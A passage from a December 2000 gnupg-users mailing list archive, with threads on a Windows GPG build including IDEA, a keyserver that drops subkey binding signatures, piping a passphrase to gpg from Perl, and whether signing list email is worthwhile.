the job for my purposes.I think it ties Timo's work nicely into GPG, with support for "idiot proof" DH/DSS keygen and file encryption/decryption. Suggestions would be most welcome, especially an easy way to allow encryption of files to any recipient. If anyone wants to modify the GPG source code and/or to use the Windows Scripting Host to make this a clear package with less reliance on DOS batch files, that would be great. P.S. - I highly recommend the "Powerarchiver" compression software for Win32. Its freeware license looks a lot like the GPL. See http://www.powerarchiver.com. It works better than any compression utility I've used, and it is compatible with just about every compression format. Ed Suominen Registered Patent Agent Web Site: http://eepatents.com PGP Public Key: http://eepatents.com/key -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From aphex@nullify.org Fri Dec 15 17:11:31 2000 From: aphex@nullify.org (Keith Ray) Date: Fri, 15 Dec 2000 11:11:31 -0600 (CST) Subject: GnuPG 1.0.4-1 + IDEA for Windows Message-ID: <976900291.3a3a50c3ac947@nullify.org> I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it should be fully backwards compatible with PGP 2.6.x. The following changes were made from a "standard" cross-compile: 1. Statically linked idea.c. Unlike Cygwin, this release requires no DLLs. 2. Removed deprecated warning when using IDEA 3. Removed secure memory warnings (Windows doesn't support secure memory). The patch was fairly trivial and appears to work fine, but I have not done extensive testing so use caution. The binary can be downloaded at www.nullify.org. Please email me if you have any questions or problems. --------------------------------------------------------------------- Keith Ray aphex@nullify.org http://www.nullify.org GPG - 0xAE1B3529 - 8227 60E5 BAA5 9461 CAB3 A6F2 4DFE F573 AE1B 3529 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Fri Dec 15 18:17:57 2000 From: rich@cnylug.org (Rich) Date: Fri, 15 Dec 2000 13:17:57 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <976900291.3a3a50c3ac947@nullify.org> References: <976900291.3a3a50c3ac947@nullify.org> Message-ID: <3A3A6055A.84B6RICH@mail.dreamscape.com> On Fri, 15 Dec 2000 11:11:31 -0600 (CST) or Thereabouts The voices in my head told me that Keith Ray said: > I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the > IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it > should be fully backwards compatible with PGP 2.6.x. > ....... Is there any way of writing some code that could actually be permanently added to the GnuPG source tree that would make adding modules to the official GnuPG (Win32) easier? It would seem to make sense to write the code, and keep it in the tree permanently, instead of constantly having to download the latest version, and then hack in the IDEA code, compile, and release a separate version. Plus I think most users would feel more secure and might feel better if it was coming from the "official" GnupG home, instead if grabbing the fragmenting versions of GnuPG (which there now seem to be 2). I was going to post this very message on the usenet to you and the gentleman who did the cygwin version. :-) It is times like this when I wish I was a real programmer. :-) Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rodneyp@utanet.at Fri Dec 15 22:25:51 2000 From: rodneyp@utanet.at (Rod Pike) Date: Fri, 15 Dec 2000 20:25:51 -0200 Subject: Error message attempting to sign a key In-Reply-To: <14905.50705.757454.743776@barber.fmi.uni-passau.de>; from Nils@infosun.fmi.uni-passau.de on Fri, Dec 15, 2000 at 08:19:45AM +0100 References: <20001214223642.A965@utanet.at> <14905.50705.757454.743776@barber.fmi.uni-passau.de> Message-ID: <20001215202550.A883@utanet.at> On Fri, Dec 15, 2000 at 08:19:45AM +0100, Nils Ellmenreich wrote: > > >>>"RP" == Rod Pike writes: > > RP> gpg: waiting for lock (hold by 821 - probably dead) ... > RP> gpg: waiting for lock (hold by 821 - probably dead) ... > RP> and it goes on. > > RP> Any ideas what the problem is? > > Oh yes. Read question 6.11 at http://www.gnupg.org/faq.html > > Cheers, Nils > -- > Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org Dohh, looks like I'm batting a thousand. Thanks for your patience. Cheers, Rod -- Rod Pike rodneyp @ utanet.at -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.net Fri Dec 15 20:20:46 2000 From: kai.raven@gmx.net (Kai Raven) Date: Fri, 15 Dec 2000 21:20:46 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <976900291.3a3a50c3ac947@nullify.org> References: <976900291.3a3a50c3ac947@nullify.org> Message-ID: <200012152120460057.00AE723D@mail.gmx.net> Hello Keith, On 15.12.2000 [Time:11:11] to subject "GnuPG 1.0.4-1 + IDEA for Windows", you wrote: >I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the >IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it >should be fully backwards compatible with PGP 2.6.x. Good news. So we have the Disastry GnuPG and yours. It would be good, to have a detailed description of the compilation and the used components for all other Win GPG users. Ciao Kai -- PGP [RSA]: 2048-bit Key-ID: 0x7B251671 3100-bit Key-ID: 0x5526B3B1 Homepage: http://beam.to/raven -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lewis@sistina.com Fri Dec 15 20:32:16 2000 From: lewis@sistina.com (lewis@sistina.com) Date: Fri, 15 Dec 2000 14:32:16 -0600 Subject: GPG key not fully accepted by public key servers Message-ID: <20001215143216.A9955@sistina.com> --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable I have a public key that has two subkeys. One is an encryption subkey with expiration date, and the other is a signing subkey with expiration date. = =20 The output of 'gpg --list-keys roadrunner' is: pub 1024D/00292648 2000-11-15 AJ Lewis (Roadrunner) uid AJ Lewis sub 1024g/9809FA0D 2000-11-15 [expires: 2001-05-14] sub 1024D/6B5D8CB1 2000-11-15 [expires: 2001-11-15] When I submit this public key to a keyserver such as http://pgp.ai.mit.edu/= I get this error: Key block in add request contained no new keys, userid's, or signatures. Your key block contained 1 format errors, which were treated as if the erroneous elements hadn't been part of your submission. The last error was on key 0xee72a386: Key block corrupt: more than one signature on subk The interesting thing is that part of the key is accepted so people can sti= ll download it, but I use the second subkey for most of my signing, and that is truncated from the key. Does anyone know why this would be? I can send my ASCII armored public key as well if that would be helpful. Please CC me to any response as I am not on the mailing list. Regards, --=20 AJ Lewis Sistina Software Inc. Voice: 612-379-3951 1313 5th St SE, Suite 111 Fax: 612-379-3952 Minneapolis, MN 55414 E-Mail: lewis@sistina.com http://www.sistina.com Current GPG fingerprint =3D 3B5F 6011 5216 76A5 2F6B 52A0 941E 1261 0029 2= 648 No-one suspects the butterfly! --RnlQjJ0d97Da+TV1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6On/QpE6/iGtdjLERAhPHAJ9TkIQVuwY4OGt7JjfRwp+M/TaJmACgnM9Z WJDKfVDDeIJNZGDWeHJhfbE= =6jh3 -----END PGP SIGNATURE----- --RnlQjJ0d97Da+TV1-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rmarq@bellatlantic.net Fri Dec 15 14:50:16 2000 From: rmarq@bellatlantic.net (RJ Marquette) Date: Fri, 15 Dec 2000 09:50:16 -0500 (EST) Subject: Question regarding clearsigning emails automatically In-Reply-To: <14905.51935.249561.139579@barber.fmi.uni-passau.de> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 15 Dec 2000, Nils Ellmenreich wrote: > write a mail with his mail client who automatically signs all mails as > John Doe. And that almost meaningless ... ;-) I'd agree, except for this: What software allows you to sign messages without ever entering the passphrase? With the pine/pgpenvelope/gpg setup I use, I have to enter it each time. I know the Win versions of PGP have a "timeout" where it stores the passphrase for so long (up to 5 minutes IIRC), but you still have to enter it once. That's where your analogy to the "signed but blank stack of documents" breaks down. I disagree that signing every email "cheapens" the process for that reason. I sign most of my list email for several reasons: the more PGP/GPG traffic floating around, the less attention each one receives. Also, don't we look a bit foolish if we claim to be advocates of PGP and GPG, but don't even use it amongst ourselves? ("Practice what you preach.") It doesn't hurt to use the signed messages. Plus, if I didn't I might forget my passphrase. :) RJ :) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- RJ Marquette rmarq(at)bellatlantic.net RSA:448B035F DSS:CB45C555 My PGP and Skating pages: http://rmarq.pair.com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: pgpenvelope - http://www.uiuc.edu/ph/www/ftobin/resources.html iD8DBQE6Oi+s0DB5TMtFxVURArbAAKDLy+weLLjopgKcG+W2fSru/a6GbQCgoHWz YGxSnTJB9t1JCWmvvObLVVM= =hQ6q -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Fri Dec 15 22:01:39 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Fri, 15 Dec 2000 16:01:39 -0600 Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215143216.A9955@sistina.com>; from lewis@sistina.com on Fri, Dec 15, 2000 at 02:32:16PM -0600 References: <20001215143216.A9955@sistina.com> Message-ID: <20001215160139.B31820@csc.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > The output of 'gpg --list-keys roadrunner' is: > pub 1024D/00292648 2000-11-15 AJ Lewis (Roadrunner) > uid AJ Lewis > sub 1024g/9809FA0D 2000-11-15 [expires: 2001-05-14] > sub 1024D/6B5D8CB1 2000-11-15 [expires: 2001-11-15] > Key block corrupt: more than one signature on subk what happens when you do gpg --export 00292648 |gpg --list-packets ? - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://cs.smsu.edu/~minton /finger minton@csc.smsu.edu _ _ my favorite OS! bjm918s@mail.smsu.edu / for PGP public key. | | <_>._ _ _ _ __ bminton@earthling.net /What are you waiting for, | |_ | || ' || | |\ \/ bminton@efn.org / try Jesus today!!! |___||_||_|_|`___|/\_\ "Many shall run to and fro, and knowledge shall be increased" --Daniel 12:4 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.2 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6OpSrp0PPDCS0QgIRAlzmAJ4mfRtx1lLzsLzIv7dom+3o1X0N2gCgi7Ar SkJkgBxdlwJ0CtH0fxZ4tBY= =eWyO -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Fri Dec 15 22:02:04 2000 From: lists@wordit.com (Marcus) Date: Fri, 15 Dec 2000 23:02:04 +0100 Subject: Passphrase in Perl script and Windows Message-ID: <200012152302040984.0017ECFA@smtprelay.t-online.de> Replying to my own question. I was given a simple way to send the passphrase for use in Perl scripts. Here it is for the archives if nobody else needs it at the moment: open(PIPE, "| gpg.exe -o $file.gpg --passphrase-fd 0 -c $file") or die $!; print PIPE $passphrase; Alternatively, Windows will pipe, it just wants an "echo" first. The following is a system command via Perl. echo $passphrase | gpg.exe -o $file.gpg --passphrase-fd 0 -c $file You can adjust the variable syntax for other uses. Btw, how about adding these kinds of examples to a FAQ document? Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lewis@sistina.com Fri Dec 15 22:08:43 2000 From: lewis@sistina.com (lewis@sistina.com) Date: Fri, 15 Dec 2000 16:08:43 -0600 Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215160139.B31820@csc.smsu.edu>; from minton@csc.smsu.edu on Fri, Dec 15, 2000 at 04:01:39PM -0600 References: <20001215143216.A9955@sistina.com> <20001215160139.B31820@csc.smsu.edu> Message-ID: <20001215160843.A11168@sistina.com> --nFreZHaLTZJo0R7j Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Dec 15, 2000 at 04:01:39PM -0600, Brian Minton wrote: > On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > > The output of 'gpg --list-keys roadrunner' is: > > pub 1024D/00292648 2000-11-15 AJ Lewis (Roadrunner) > > uid AJ Lewis > > sub 1024g/9809FA0D 2000-11-15 [expires: 2001-05-14] > > sub 1024D/6B5D8CB1 2000-11-15 [expires: 2001-11-15] > > > Key block corrupt: more than one signature on subk >=20 > what happens when you do gpg --export 00292648 |gpg --list-packets ? I get this: :public key packet: version 4, algo 17, created 974309008, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1016 bits] pkey[3]: [1022 bits] :user ID packet: "AJ Lewis (Roadrunner) " :signature packet: algo 17, keyid 941E126100292648 version 4, created 974309008, md5len 0, sigclass 13 digest algo 2, begin of digest f3 29 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [160 bits] data: [156 bits] :user ID packet: "AJ Lewis " :signature packet: algo 17, keyid 941E126100292648 version 4, created 975593280, md5len 0, sigclass 13 digest algo 2, begin of digest d1 be hashed subpkt 2 len 5 (sig created 2000-11-30) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [159 bits] :public sub key packet: version 4, algo 16, created 974309011, expires 0 pkey[0]: [1024 bits] pkey[1]: [3 bits] pkey[2]: [1023 bits] :signature packet: algo 17, keyid 941E126100292648 version 4, created 974310923, md5len 0, sigclass 18 digest algo 2, begin of digest d6 95 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 9 len 5 (key expires after 180d0h31m) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [160 bits] :public sub key packet: version 4, algo 17, created 974309312, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1023 bits] pkey[3]: [1021 bits] :signature packet: algo 17, keyid 941E126100292648 version 4, created 974309312, md5len 0, sigclass 18 digest algo 2, begin of digest ed 69 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 9 len 5 (key expires after 1y0d0h0m) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [158 bits] Again, please CC me to any responses. Thanks, --=20 AJ Lewis Sistina Software Inc. Voice: 612-379-3951 1313 5th St SE, Suite 111 Fax: 612-379-3952 Minneapolis, MN 55414 E-Mail: lewis@sistina.com http://www.sistina.com Current GPG fingerprint =3D 3B5F 6011 5216 76A5 2F6B 52A0 941E 1261 0029 2= 648 A computer without a Microsoft operating system is like a dog without bricks tied to its head. --nFreZHaLTZJo0R7j Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6OpZrpE6/iGtdjLERApSLAJ9kvQxwTAvab6DyDhapV+bsrT56VwCfasAd ECneWfa8INP79WJjAiR7az0= =U7+M -----END PGP SIGNATURE----- --nFreZHaLTZJo0R7j-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Sat Dec 16 00:10:59 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Sat, 16 Dec 2000 01:10:59 +0100 (CET) Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215143216.A9955@sistina.com> Message-ID: On Fri, 15 Dec 2000 lewis@sistina.com wrote: > I have a public key that has two subkeys. One is an encryption subkey with > expiration date, and the other is a signing subkey with expiration date. [snip] > When I submit this public key to a keyserver such as > http://pgp.ai.mit.edu/ I get this error: [snip] > The last error was on key 0xee72a386: > Key block corrupt: more than one signature on subk I have also seen this. The culprit seems to be the pks-type keyserver. Currently no solution, AFAIK. You might want to use the NAI keyservers until this is resolved. > The interesting thing is that part of the key is accepted so people can still > download it, but I use the second subkey for most of my signing, and that is > truncated from the key. Does anyone know why this would be? I can send my My current assessment is that the pks is stripping off "subkey binding signatures", leaving the key in a crippled state. I believe it only happens when adding a new key, adding a subkey to an existing key appears to fail entirely. If people can download your key they must furthermore be using pgp, because gpg does not import such a key. I have also tried to use a broken key for encryption in pgp, but it did not work. Has somebody successfully encrypted mail to you using your freshly downloaded key? Regards, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Sat Dec 16 00:52:45 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Sat, 16 Dec 2000 01:52:45 +0100 (CET) Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001215160843.A11168@sistina.com> Message-ID: On Fri, 15 Dec 2000 lewis@sistina.com wrote: > On Fri, Dec 15, 2000 at 04:01:39PM -0600, Brian Minton wrote: > > On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > > > Key block corrupt: more than one signature on subk > > > > what happens when you do gpg --export 00292648 |gpg --list-packets ? > You have to examine the key *returned* from the keyserver. Gpg will not import such a key, but you can download and then export it with pgp or cut & paste it from the web interface. You will see something like this (two subkeys and only one binding signature): $ gpg --list-packets test.asc :public key packet: version 4, algo 17, created 976788814, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1024 bits] pkey[3]: [1024 bits] :user ID packet: "Testinger " :signature packet: algo 17, keyid 6EF5D2F9EF2AF055 version 4, created 976788814, md5len 0, sigclass 10 digest algo 2, begin of digest bb a4 hashed subpkt 2 len 5 (sig created 2000-12-14) hashed subpkt 9 len 5 (key expires after 5y1d0h0m) hashed subpkt 11 len 5 (pref-sym-algos: 3 2 1 10) hashed subpkt 25 len 2 (primary user ID) hashed subpkt 27 len 5 (key flags: 03 00 00 00) subpkt 16 len 9 (issuer key ID 6EF5D2F9EF2AF055) data: [155 bits] data: [158 bits] :public sub key packet: version 4, algo 16, created 976748400, expires 0 pkey[0]: [2048 bits] pkey[1]: [2 bits] pkey[2]: [2046 bits] :public sub key packet: version 4, algo 16, created 1008284400, expires 0 pkey[0]: [2048 bits] pkey[1]: [2 bits] pkey[2]: [2045 bits] :signature packet: algo 17, keyid 6EF5D2F9EF2AF055 version 4, created 976790552, md5len 0, sigclass 18 digest algo 2, begin of digest bd c7 hashed subpkt 2 len 5 (sig created 2000-12-14) hashed subpkt 9 len 5 (key expires after 1y0d0h0m) hashed subpkt 27 len 5 (key flags: 0C 00 00 00) subpkt 16 len 9 (issuer key ID 6EF5D2F9EF2AF055) data: [160 bits] data: [159 bits] -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Fri Dec 15 21:43:03 2000 From: trappedvector@crosswinds.net (Martin) Date: Fri, 15 Dec 2000 22:43:03 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001214180848.K23140@gnupg.de>; from wk@gnupg.org on Thu, Dec 14, 2000 at 06:08:48PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> Message-ID: <20001215224303.A370@crosswinds.net> --qDbXVdCdHGoSgWSk Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thursday, December 14, 2000 (CS:4.50.349) 18:08:48 [PM] (+0100) Werner Koch [wk@gnupg.org] wrote... > On Thu, 14 Dec 2000, Lars Hecking wrote: >=20 > > IMHO signing list email is a useless and wasteful exercise, especially > > if the sender hasn't submitted his/her keys to the public keyservers. >=20 > Well, that depends on the content of the mail. But you are right, > for the bulk of ML traffic, there is no need for signing. >=20 > Werner It you dont upload your key to the keyservers signing is useless and=20 wasteful. On the other hand any signature is (mostly) a waste of bandwith! BB mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - No signature - Saving bandwith! - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --qDbXVdCdHGoSgWSk Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6OpBnffxhyW5sNDERApwqAJwP2U/KOGcaSfnV/9GjMkxVXrmn6gCgi2YU 79YYk5I2GrQxzXLIc+1W6ds= =/+ch -----END PGP SIGNATURE----- --qDbXVdCdHGoSgWSk-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From evangelo@pigdog.org Sat Dec 16 08:51:02 2000 From: evangelo@pigdog.org (ESP) Date: 16 Dec 2000 00:51:02 -0800 Subject: Question regarding clearsigning emails automatically In-Reply-To: Martin's message of "Fri, 15 Dec 2000 22:43:03 +0100" References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> Message-ID: <87r938eoll.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "M" == Martin writes: M> On the other hand any signature is (mostly) a waste of M> bandwith! As you've so kindly demonstrated, so is most list traffic. ~ESP - -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ESP | http://pigdog.org/ "Fan belts break at 3AM. I get mad, drinks get spilled." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6OyzxbZezvPSYodkRAv0sAJ9cSZmP1oGOt5QXdrjl+VbHFWo3mACdEoc3 kWCJIqMuATLqe8xqXNC+Yx4= =r62T -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Sat Dec 16 18:42:49 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Sat, 16 Dec 2000 12:42:49 -0600 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001215224303.A370@crosswinds.net>; from trappedvector@crosswinds.net on Fri, Dec 15, 2000 at 10:43:03PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> Message-ID: <20001216124247.B638@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Dec 15, 2000 at 10:43:03PM +0100, Martin wrote: > It you dont upload your key to the keyservers signing is useless and > wasteful. yes, but not completely, since at a later time, you can always produce your public key at a later time if necessary to prove that you did in fact write a given message, or that you did not. However, except for special circumstances, I can't imagine any reason not to send your public key to the keyserver, especially if you are going to be publishing (eg on a list) signed material. > On the other hand any signature is (mostly) a waste of bandwith! > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - > No signature - Saving bandwith! > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - and yet you signed the message :-) - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6O7d6p0PPDCS0QgIRAhzgAJwPdZMBCN4X3k9I4mEjCiJQ9S+D1wCfVDBF aGxAl3k3B/FBJPo8fJKx5yQ= =BalB -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Sat Dec 16 22:00:34 2000 From: trappedvector@crosswinds.net (Martin) Date: Sat, 16 Dec 2000 23:00:34 +0100 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001216124247.B638@aspirin.smsu.edu>; from minton@csc.smsu.edu on Sat, Dec 16, 2000 at 12:42:49PM -0600 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> <20001216124247.B638@aspirin.smsu.edu> Message-ID: <20001216230034.A404@crosswinds.net> --Q68bSM7Ycu6FN28Q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Saturday, December 16, 2000 (CS:6.50.351) 12:42:49 [PM] (-0600) Brian Minton [minton@csc.smsu.edu] wrote... > yes, but not completely, since at a later time, you can always produce yo= ur > public key at a later time if necessary to prove that you did in fact wri= te a > given message, or that you did not. =20 ^^^^^^^^^^^^^^^^^^^^ Thats not possible! If you signed a message (which you do with your private key) and i verify it with your public key (and im sure its yours) i can be= =20 sure YOU and nobody else wrote that message. If you generate a new key pair i would see that and would still have you public key. Wait a sec.=20 > you can always produce your public key at a later time Do you mean to *upload* your public key at a later time? Then you are right. I never thought about that. To upload you key later to prove you did write a message works. But you cant prove you didnt! What if you just generate a new one? =3D=3D=3D=3D> This message is not from me. Thats not my public key! See! > However, except for special > circumstances, I can't imagine any reason not to send your public key to = the > keyserver, especially if you are going to be publishing (eg on a list) si= gned > material. agree > and yet you signed the message :-) see the joke there...? CYL mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - Linux - its only limit is its physical environment - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --Q68bSM7Ycu6FN28Q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6O+YCffxhyW5sNDERAi8WAKCDenU3xxlEr3Qms5fz3JX4WrNOnQCgo1yY PCzdaUS0XKxQlE0H30EN84Y= =S7be -----END PGP SIGNATURE----- --Q68bSM7Ycu6FN28Q-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Sun Dec 17 02:36:07 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Sat, 16 Dec 2000 20:36:07 -0600 Subject: Question regarding clearsigning emails automatically In-Reply-To: <20001216230034.A404@crosswinds.net>; from trappedvector@crosswinds.net on Sat, Dec 16, 2000 at 11:00:34PM +0100 References: <20001214093003.C7654@berbee.com> <20001214161817.B10991@nmrc.ie> <20001214180848.K23140@gnupg.de> <20001215224303.A370@crosswinds.net> <20001216124247.B638@aspirin.smsu.edu> <20001216230034.A404@crosswinds.net> Message-ID: <20001216203604.A1580@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sat, Dec 16, 2000 at 11:00:34PM +0100, Martin wrote: > On Saturday, December 16, 2000 (CS:6.50.351) 12:42:49 [PM] (-0600) > Brian Minton [minton@csc.smsu.edu] wrote... > > > yes, but not completely, since at a later time, you can always produce your > > public key at a later time if necessary to prove that you did in fact write a > > given message, or that you did not. > ^^^^^^^^^^^^^^^^^^^^ > Thats not possible! If you signed a message (which you do with your private > key) and i verify it with your public key (and im sure its yours) i can be > sure YOU and nobody else wrote that message. > If you generate a new key pair i would see that and would still have you > public key. okay, that makes sense. If you upload your key, and send messages with it, and have several people who are associated with you in real life, there is a pretty good chance that the key is in fact your key. The only possible scenario in which you might be able to prove (or at least indicate) that you didn't write a message, would be if it was *purportedly* signed with your key, but the signature doesn't verify. However, even then, that is not really proof. However, I stand by my statement that you might need to prove that you did write a message. On the gripping hand, that still doesn't give any plausible scenario for not sending your key. Given that the keyservers may be accessed through email and http, as well as the modified http used normally, I don't see any reason for someone to be sending messages to a public forum and not sending the public key to the keyserver. Mind you in a closed setting such as a corporate intranet, with messages not going out to the internet, I suppose you wouldn't need to, but otherwise, I don't see any reason why people don't do it, except that perhaps they aren't aware of the existence of the public keyservers. - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6PCZXp0PPDCS0QgIRAk2XAJ4uNlqO0I8ml+SDb2v51uGeTjbDKwCfRvXj 2egxaSe8fCC+xO/bJ579fhk= =cLcF -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From LadyV@ladiesfirst.de Sun Dec 17 10:24:15 2000 From: LadyV@ladiesfirst.de (LadyV@ladiesfirst.de) 